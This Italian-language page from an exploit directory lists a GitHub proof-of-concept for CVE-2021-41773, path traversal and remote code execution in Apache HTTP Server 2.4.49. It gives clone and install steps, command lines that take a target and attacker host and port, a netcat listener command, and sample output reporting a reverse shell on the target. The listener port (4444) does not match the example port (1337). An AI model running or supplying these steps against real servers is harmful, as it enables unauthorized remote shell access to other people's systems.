Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41773 — Exploit proof-of-concept per CVE-2021-41773, una vulnerabilità di path traversal e remote code execution in Apache HTTP Server 2.4.49. Automatizza la verifica della vulnerabilità e la consegna del payload reverse shell. | Kitploit
Strumenti/GitHubGitHub/adrianmafandy/cve-2021-41773
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubadrianmafandy/cve-2021-41773

CVE-2021-41773

Exploit proof-of-concept per CVE-2021-41773, una vulnerabilità di path traversal e remote code execution in Apache HTTP Server 2.4.49. Automatizza la verifica della vulnerabilità e la consegna del payload reverse shell.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
19 mesi faNon ancora revisionato

CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal & RCE

Security Platform Language

📖 Descrizione

Questo è un exploit proof-of-concept per CVE-2021-41773, una vulnerabilità di attraversamento del percorso e di esecuzione remota di codice in Apache HTTP Server 2.4.49.

Dettagli della vulnerabilità

  • CVE: CVE-2021-41773
  • Versione interessata: Apache HTTP Server 2.4.49
  • Tipo di vulnerabilità: Attraversamento del percorso → Esecuzione remota di codice

🚀 Utilizzo

Installazione

root@kitploit:~
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests

Utilizzo di base

root@kitploit:~
# Sintassi base
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>

# Forza lo sfruttamento anche se il controllo della vulnerabilità fallisce
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f

Esempio

root@kitploit:~
# Sintassi base
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Forza lo sfruttamento anche se il controllo della vulnerabilità fallisce
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f

Configurazione del listener

Prima di eseguire l'exploit, configura un listener netcat:

root@kitploit:~
nc -lvnp 4444

Output previsto

root@kitploit:~
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener
Scarica lo strumento